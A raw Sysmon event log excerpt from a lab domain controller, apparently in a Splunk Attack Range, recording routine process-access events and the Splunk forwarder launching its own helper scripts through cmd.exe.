13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.973{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.859{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.857{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.857{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.857{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.794{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.793{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.790{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.777{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
